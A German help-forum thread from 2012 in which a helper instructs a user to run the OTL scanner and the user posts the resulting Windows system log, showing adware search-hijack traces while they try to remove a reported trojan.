Virus, Trojaner VirTool:Win32/Injector.DM eingefangen. Lt. Microsoft ziemlich böses Ding und recht neu

cosinus · 29.10.2012, 12:22

Systemscan mit OTL

Lade Dir bitte OTL von Oldtimer herunter und speichere es auf Deinem Desktop. Falls schon vorhanden, bitte die ältere vorhandene Datei durch die neu heruntergeladene Datei ersetzen, damit du auch wirklich mit einer aktuellen Version von OTL arbeitest.

Doppelklick auf die OTL.exe
Vista User: Rechtsklick auf die OTL.exe und "als Administrator ausführen" wählen
Setze oben mittig den Haken bei Scanne alle Benutzer
Oben findest Du ein Kästchen mit Output. Wähle bitte Minimal Output
Unter Extra Registry, wähle bitte Use SafeList
Klicke nun auf Run Scan links oben
Wenn der Scan beendet wurde werden 2 Logfiles erstellt
Poste die Logfiles hier in den Thread.

Bitte alles nach Möglichkeit hier in CODE-Tags posten.

Wird so gemacht:

[code] hier steht das Log [/code]

Und das ganze sieht dann so aus:

Code:

ATTFilter

 hier steht das Log

tiggth1 · 29.10.2012, 15:23

Hallo Cosinus,
hier die Logdatei (hab nur eine) aus OTL:
OTL Logfile:

Code:

ATTFilter

OTL logfile created on: 29.10.2012 14:32:18 - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\ASUS TT\Desktop
64bit- Ultimate Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy
 
4,00 Gb Total Physical Memory | 2,08 Gb Available Physical Memory | 51,93% Memory free
8,00 Gb Paging File | 5,94 Gb Available in Paging File | 74,27% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 149,05 Gb Total Space | 50,64 Gb Free Space | 33,97% Space Free | Partition Type: NTFS
Drive D: | 233,66 Gb Total Space | 134,08 Gb Free Space | 57,38% Space Free | Partition Type: NTFS
Drive E: | 100,00 Mb Total Space | 69,81 Mb Free Space | 69,82% Space Free | Partition Type: NTFS
 
Computer Name: ASUSTT-PC | User Name: ASUS TT | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - C:\Users\ASUS TT\Desktop\OTL.exe (OldTimer Tools)
PRC - C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
PRC - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_11_4_402_287.exe (Adobe Systems, Inc.)
PRC - C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe (Freemake)
PRC - C:\Program Files (x86)\Freemake\CaptureLib\CaptureLibService.exe (Freemake)
PRC - C:\Program Files (x86)\pdf24\pdf24.exe (Geek Software GmbH)
PRC - C:\Program Files (x86)\TeamViewer\Version7\TeamViewer.exe (TeamViewer GmbH)
PRC - C:\Program Files (x86)\TeamViewer\Version7\TeamViewer_Service.exe (TeamViewer GmbH)
PRC - C:\Program Files (x86)\TeamViewer\Version7\tv_w32.exe (TeamViewer GmbH)
PRC - C:\Program Files (x86)\avmwlanstick\WlanNetService.exe (AVM Berlin)
PRC - C:\Program Files (x86)\Greenshot\Greenshot.exe ()
PRC - C:\Program Files (x86)\Spybot - Search & Destroy\TeaTimer.exe (Safer Networking Limited)
PRC - C:\Program Files (x86)\Spybot - Search & Destroy\SDWinSec.exe (Safer Networking Ltd.)
 
 
========== Modules (No Company Name) ==========
 
MOD - C:\Program Files (x86)\Mozilla Firefox\mozjs.dll ()
MOD - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_4_402_287.dll ()
MOD - C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\7b7fbe651c6e72f12099a298654c9594\System.Windows.Forms.ni.dll ()
MOD - C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6bb439b3f87736d3248ae27d43e2c0d6\System.Drawing.ni.dll ()
MOD - C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\ba3d70b651454c7d49b407b93663bfed\System.Xml.ni.dll ()
MOD - C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\cfa9c506bfb9254c89dace7b83bc9f9d\System.Configuration.ni.dll ()
MOD - C:\Windows\assembly\NativeImages_v2.0.50727_32\System\ce9ff6baf9053ed2ed673d948179195c\System.ni.dll ()
MOD - C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\acfc1391e45fedd2a359778ea57d914c\mscorlib.ni.dll ()
MOD - C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_de_b77a5c561934e089\mscorlib.resources.dll ()
MOD - C:\Program Files (x86)\Greenshot\Greenshot.exe ()
MOD - C:\Program Files (x86)\Greenshot\GreenshotPlugin.dll ()
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - (AppMgmt) -- C:\Windows\SysNative\appmgmts.dll (Microsoft Corporation)
SRV - (NitroReaderDriverReadSpool2) -- C:\Programme\Common Files\Nitro PDF\Reader\2.0\NitroPDFReaderDriverService2x64.exe (Nitro PDF Software)
SRV - (NisSrv) -- C:\Programme\Microsoft Security Client\NisSrv.exe (Microsoft Corporation)
SRV - (MsMpSvc) -- C:\Programme\Microsoft Security Client\MsMpEng.exe (Microsoft Corporation)
SRV - (Freemake Improver) -- C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe (Freemake)
SRV - (FreemakeVideoCapture) -- C:\Program Files (x86)\Freemake\CaptureLib\CaptureLibService.exe (Freemake)
SRV - (wlidsvc) -- C:\Programme\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE (Microsoft Corp.)
SRV - (TeamViewer7) -- C:\Program Files (x86)\TeamViewer\Version7\TeamViewer_Service.exe (TeamViewer GmbH)
SRV - (WAS) -- C:\Windows\SysWOW64\inetsrv\iisw3adm.dll (Microsoft Corporation)
SRV - (W3SVC) -- C:\Windows\SysWOW64\inetsrv\iisw3adm.dll (Microsoft Corporation)
SRV - (AppHostSvc) -- C:\Windows\SysWOW64\inetsrv\apphostsvc.dll (Microsoft Corporation)
SRV - (AVM WLAN Connection Service) -- C:\Program Files (x86)\avmwlanstick\WlanNetService.exe (AVM Berlin)
SRV - (clr_optimization_v4.0.30319_32) -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe (Microsoft Corporation)
SRV - (clr_optimization_v2.0.50727_32) -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe (Microsoft Corporation)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - (NisDrv) -- C:\Windows\SysNative\drivers\NisDrvWFP.sys (Microsoft Corporation)
DRV:64bit: - (fssfltr) -- C:\Windows\SysNative\drivers\fssfltr.sys (Microsoft Corporation)
DRV:64bit: - (VBoxNetAdp) -- C:\Windows\SysNative\drivers\VBoxNetAdp.sys (Oracle Corporation)
DRV:64bit: - (Fs_Rec) -- C:\Windows\SysNative\drivers\fs_rec.sys (Microsoft Corporation)
DRV:64bit: - (RTL8167) -- C:\Windows\SysNative\drivers\Rt64win7.sys (Realtek                                            )
DRV:64bit: - (teamviewervpn) -- C:\Windows\SysNative\drivers\teamviewervpn.sys (TeamViewer GmbH)
DRV:64bit: - (Ext2Fsd) -- C:\Windows\SysNative\drivers\ext2fsd.sys (www.ext2fsd.com)
DRV:64bit: - (amdsata) -- C:\Windows\SysNative\drivers\amdsata.sys (Advanced Micro Devices)
DRV:64bit: - (amdxata) -- C:\Windows\SysNative\drivers\amdxata.sys (Advanced Micro Devices)
DRV:64bit: - (HpSAMD) -- C:\Windows\SysNative\drivers\HpSAMD.sys (Hewlett-Packard Company)
DRV:64bit: - (TsUsbFlt) -- C:\Windows\SysNative\drivers\TsUsbFlt.sys (Microsoft Corporation)
DRV:64bit: - (RdpVideoMiniport) -- C:\Windows\SysNative\drivers\rdpvideominiport.sys (Microsoft Corporation)
DRV:64bit: - (NVHDA) -- C:\Windows\SysNative\drivers\nvhda64v.sys (NVIDIA Corporation)
DRV:64bit: - (fwlanusbn) -- C:\Windows\SysNative\drivers\fwlanusbn.sys (AVM GmbH)
DRV:64bit: - (avmeject) -- C:\Windows\SysNative\drivers\avmeject.sys (AVM Berlin)
DRV:64bit: - (amdsbs) -- C:\Windows\SysNative\drivers\amdsbs.sys (AMD Technologies Inc.)
DRV:64bit: - (LSI_SAS2) -- C:\Windows\SysNative\drivers\lsi_sas2.sys (LSI Corporation)
DRV:64bit: - (stexstor) -- C:\Windows\SysNative\drivers\stexstor.sys (Promise Technology)
DRV:64bit: - (ebdrv) -- C:\Windows\SysNative\drivers\evbda.sys (Broadcom Corporation)
DRV:64bit: - (b06bdrv) -- C:\Windows\SysNative\drivers\bxvbda.sys (Broadcom Corporation)
DRV:64bit: - (b57nd60a) -- C:\Windows\SysNative\drivers\b57nd60a.sys (Broadcom Corporation)
DRV:64bit: - (hcw85cir) -- C:\Windows\SysNative\drivers\hcw85cir.sys (Hauppauge Computer Works, Inc.)
DRV:64bit: - (RimUsb) -- C:\Windows\SysNative\drivers\RimUsb_AMD64.sys (Research In Motion Limited)
DRV - (WIMMount) -- C:\Windows\SysWOW64\drivers\wimmount.sys (Microsoft Corporation)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = 
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\..\SearchScopes,DefaultScope = 
 
 
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope = 
 
IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope = 
 
IE - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:blank
IE - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = de-DE
IE - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 39 2C 02 92 1E 73 CD 01  [binary data]
IE - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001\..\SearchScopes,DefaultScope = 
IE - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001\..\SearchScopes\{0388404D-6072-4CEB-B521-8F090FEAEE57}: "URL" = hxxp://klit.startnow.com/s/?q={searchTerms}&src=defsearch&provider=&provider_name=yahoo&provider_code=&partner_id=693&product_id=741&affiliate_id=&channel=&toolbar_id=200&toolbar_version=2.4.0&install_country=DE&install_date=20120701&user_guid=D284EE3DAB114B7D803864A7EC865E6D&machine_id=19b7a606ba73c4b553ec4228359a0fae&browser=IE&os=win&os_version=6.1-x64-SP0&iesrc={referrer:source}
IE - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = fritz.box
 
========== FireFox ==========
 
FF - prefs.js..browser.search.selectedEngine: "MyStart Search"
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..browser.startup.homepage: "www.google.de"
FF - prefs.js..extensions.enabledAddons: {ACAA314B-EEBA-48e4-AD47-84E31C44796C}:1.0.10
FF - user.js - File not found
 
FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_11_4_402_287.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF:64bit: - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.7.2: C:\Windows\system32\npDeployJava1.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.7.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_4_402_287.dll ()
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Browser Plugin,version=1.0.0: C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin: C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeLive,version=1.5: C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=16.4.3505.0912: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@nitropdf.com/NitroPDF: C:\Program Files (x86)\Nitro PDF\Reader 2\npnitromozilla.dll ( )
FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.0.2: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
 
64bit-FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{336D0C35-8A85-403a-B9D2-65C292C39087}: C:\PROGRAM FILES\WEB ASSISTANT\FIREFOX
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{23fcfd51-4958-4f00-80a3-ae97e717ed8b}: C:\Program Files (x86)\DivX\DivX Plus Web Player\firefox\DivXHTML5 [2012.07.01 17:06:50 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 16.0.2\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components [2012.10.29 14:29:33 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 16.0.2\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2012.10.14 20:27:52 | 000,000,000 | ---D | M]
 
[2012.07.01 13:04:39 | 000,000,000 | ---D | M] (No name found) -- C:\Users\ASUS TT\AppData\Roaming\mozilla\Extensions
[2012.10.23 18:53:05 | 000,000,000 | ---D | M] (No name found) -- C:\Users\ASUS TT\AppData\Roaming\mozilla\Firefox\Profiles\ewlyys0h.default\extensions
[2012.08.14 00:29:55 | 000,000,000 | ---D | M] ("Free YouTube Download (Free Studio) Menu") -- C:\Users\ASUS TT\AppData\Roaming\mozilla\Firefox\Profiles\ewlyys0h.default\extensions\{ACAA314B-EEBA-48e4-AD47-84E31C44796C}
[2012.08.11 20:56:01 | 000,000,000 | ---D | M] (ADDICT-THING) -- C:\Users\ASUS TT\AppData\Roaming\mozilla\Firefox\Profiles\ewlyys0h.default\extensions\5026b649cf7b4@5026b649cf7ee.info
[2012.10.07 13:19:05 | 000,000,000 | ---D | M] (OneClickDownloader) -- C:\Users\ASUS TT\AppData\Roaming\mozilla\Firefox\Profiles\ewlyys0h.default\extensions\OneClickDownload@OneClickDownload.com
[2012.07.10 19:38:19 | 000,263,952 | ---- | M] () (No name found) -- C:\Users\ASUS TT\AppData\Roaming\mozilla\firefox\profiles\ewlyys0h.default\extensions\langpack-de@firefox.mozilla.org.xpi
[2012.07.10 19:34:45 | 000,301,714 | ---- | M] () (No name found) -- C:\Users\ASUS TT\AppData\Roaming\mozilla\firefox\profiles\ewlyys0h.default\extensions\{25A1388B-6B18-46c3-BEBA-A81915D0DE8F}.xpi
[2012.08.12 10:17:35 | 000,741,958 | ---- | M] () (No name found) -- C:\Users\ASUS TT\AppData\Roaming\mozilla\firefox\profiles\ewlyys0h.default\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi
[2012.10.14 20:27:51 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\mozilla firefox\extensions
[2012.10.29 14:29:33 | 000,261,600 | ---- | M] (Mozilla Foundation) -- C:\Program Files (x86)\mozilla firefox\components\browsercomps.dll
[2012.07.01 17:10:40 | 000,472,808 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files (x86)\mozilla firefox\plugins\npdeployJava1.dll
[2012.07.14 01:45:08 | 000,001,392 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\amazondotcom-de.xml
[2012.09.07 21:45:38 | 000,002,465 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\bing.xml
[2012.07.14 01:45:08 | 000,001,153 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\eBay-de.xml
[2012.07.14 01:45:08 | 000,006,805 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\leo_ende_de.xml
[2012.07.14 01:45:08 | 000,001,178 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\wikipedia-de.xml
[2012.07.14 01:45:07 | 000,001,105 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\yahoo-de.xml
 
O1 HOSTS File: ([2012.10.25 17:17:19 | 000,000,027 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O1 - Hosts: 127.0.0.1       localhost
O2:64bit: - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2:64bit: - BHO: (Windows Live ID Sign-in Helper) - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Programme\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
O2:64bit: - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Programme\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O2 - BHO: (DivX Plus Web Player HTML5 <video>) - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files (x86)\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll (DivX, LLC)
O2 - BHO: (Spybot-S&D IE Protection) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files (x86)\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
O4:64bit: - HKLM..\Run: [MSC] c:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4 - HKLM..\Run: [PDFPrint] C:\Program Files (x86)\pdf24\pdf24.exe (Geek Software GmbH)
O4 - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001..\Run: [Greenshot] C:\Program Files (x86)\Greenshot\Greenshot.exe ()
O4 - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001..\Run: [SpybotSD TeaTimer] C:\Program Files (x86)\Spybot - Search & Destroy\TeaTimer.exe (Safer Networking Limited)
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 0
O7 - HKU\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-18\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-19\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-20\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O8:64bit: - Extra context menu item: Free YouTube Download - C:\Users\ASUS TT\AppData\Roaming\DVDVideoSoftIEHelpers\freeytvdownloader.htm ()
O8:64bit: - Extra context menu item: Free YouTube to MP3 Converter - C:\Users\ASUS TT\AppData\Roaming\DVDVideoSoftIEHelpers\freeyoutubetomp3converter.htm ()
O8:64bit: - Extra context menu item: Nach Microsoft &Excel exportieren - res://C:\PROGRA~2\MIF5BA~1\Office10\EXCEL.EXE/3000 File not found
O8 - Extra context menu item: Free YouTube Download - C:\Users\ASUS TT\AppData\Roaming\DVDVideoSoftIEHelpers\freeytvdownloader.htm ()
O8 - Extra context menu item: Free YouTube to MP3 Converter - C:\Users\ASUS TT\AppData\Roaming\DVDVideoSoftIEHelpers\freeyoutubetomp3converter.htm ()
O8 - Extra context menu item: Nach Microsoft &Excel exportieren - res://C:\PROGRA~2\MIF5BA~1\Office10\EXCEL.EXE/3000 File not found
O9 - Extra 'Tools' menuitem : Spybot - Search && Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files (x86)\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000007 [] - C:\Programme\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL (Microsoft Corp.)
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000008 [] - C:\Programme\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL (Microsoft Corp.)
O13 - gopher Prefix: missing
O15 - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001\..Trusted Domains: fritz.box ([]* in Lokales Intranet)
O15 - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001\..Trusted Domains: servertt ([]file in Lokales Intranet)
O15 - HKU\S-1-5-21-1677599884-1303755846-2274857191-1001\..Trusted Ranges: Range1 ([*] in Lokales Intranet)
O16:64bit: - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_01-windows-i586.cab (Reg Error: Value error.)
O16:64bit: - DPF: {CAFEEFAC-0017-0000-0001-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_01-windows-i586.cab (Java Plug-in 1.7.0_01)
O16:64bit: - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_01-windows-i586.cab (Java Plug-in 10.7.2)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_22-windows-i586.cab (Java Plug-in 1.6.0_22)
O16 - DPF: {CAFEEFAC-0016-0000-0022-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_22-windows-i586.cab (Java Plug-in 1.6.0_22)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_22-windows-i586.cab (Java Plug-in 1.6.0_22)
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} https://fpdownload.macromedia.com/get/shockwave/cabs/flash/swflash.cab (Shockwave Flash Object)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.178.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{3133E262-48F1-427F-88FF-298FF3B05A8D}: DhcpNameServer = 192.168.178.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{E6AF5C53-B425-45BB-A4BF-F1416C3A8AF5}: DhcpNameServer = 192.168.178.1
O18:64bit: - Protocol\Handler\livecall - No CLSID value found
O18:64bit: - Protocol\Handler\msdaipp - No CLSID value found
O18:64bit: - Protocol\Handler\msdaipp\0x00000001 - No CLSID value found
O18:64bit: - Protocol\Handler\msdaipp\oledb - No CLSID value found
O18:64bit: - Protocol\Handler\msnim - No CLSID value found
O18:64bit: - Protocol\Handler\mso-offdap - No CLSID value found
O18:64bit: - Protocol\Handler\wlmailhtml - No CLSID value found
O18:64bit: - Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
O18 - Protocol\Handler\mso-offdap {3D9F03FA-7A94-11D3-BE81-0050048385D1} - C:\PROGRA~2\COMMON~1\MICROS~1\WEBCOM~1\10\OWC10.DLL (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysWOW64\userinit.exe (Microsoft Corporation)
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2012.06.26 19:34:02 | 000,000,000 | ---- | M] () - E:\AUTOEXEC.BAT -- [ NTFS ]
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = ComFile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = ComFile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2012.10.29 14:30:28 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\ASUS TT\Desktop\OTL.exe
[2012.10.28 21:05:48 | 004,731,392 | ---- | C] (AVAST Software) -- C:\Users\ASUS TT\Desktop\aswMBR.exe
[2012.10.28 17:28:49 | 000,000,000 | -HSD | C] -- C:\$RECYCLE.BIN
[2012.10.28 15:21:40 | 002,213,464 | ---- | C] (Kaspersky Lab ZAO) -- C:\Users\ASUS TT\Desktop\tdsskiller.exe
[2012.10.28 15:13:09 | 000,000,000 | ---D | C] -- C:\Windows\temp
[2012.10.28 14:59:34 | 004,989,309 | R--- | C] (Swearware) -- C:\Users\ASUS TT\Desktop\ComboFix.exe
[2012.10.25 17:10:02 | 000,518,144 | ---- | C] (SteelWerX) -- C:\Windows\SWREG.exe
[2012.10.25 17:10:02 | 000,060,416 | ---- | C] (NirSoft) -- C:\Windows\NIRCMD.exe
[2012.10.25 17:10:01 | 000,406,528 | ---- | C] (SteelWerX) -- C:\Windows\SWSC.exe
[2012.10.25 17:09:47 | 000,000,000 | ---D | C] -- C:\Users\ASUS TT\AppData\Roaming\NVIDIA
[2012.10.25 17:03:07 | 000,000,000 | ---D | C] -- C:\Qoobox
[2012.10.25 17:02:54 | 000,000,000 | ---D | C] -- C:\Windows\erdnt
[2012.10.21 18:24:53 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\ESET
[2012.10.21 18:24:32 | 002,322,184 | ---- | C] (ESET) -- C:\Users\ASUS TT\Desktop\esetsmartinstaller_enu.exe
[2012.10.18 00:10:40 | 000,000,000 | ---D | C] -- C:\Users\ASUS TT\AppData\Roaming\DriverCure
[2012.10.18 00:10:39 | 000,000,000 | ---D | C] -- C:\Users\ASUS TT\AppData\Roaming\SpeedyPC Software
[2012.10.18 00:10:17 | 000,000,000 | ---D | C] -- C:\ProgramData\SpeedyPC Software
[2012.10.16 19:22:13 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Emsisoft Anti-Malware
[2012.10.16 19:22:13 | 000,000,000 | ---D | C] -- C:\Users\ASUS TT\Documents\Anti-Malware
[2012.10.14 20:27:50 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Firefox
[2012.10.14 19:58:59 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\pdf24
[2012.10.10 19:03:25 | 005,559,664 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ntoskrnl.exe
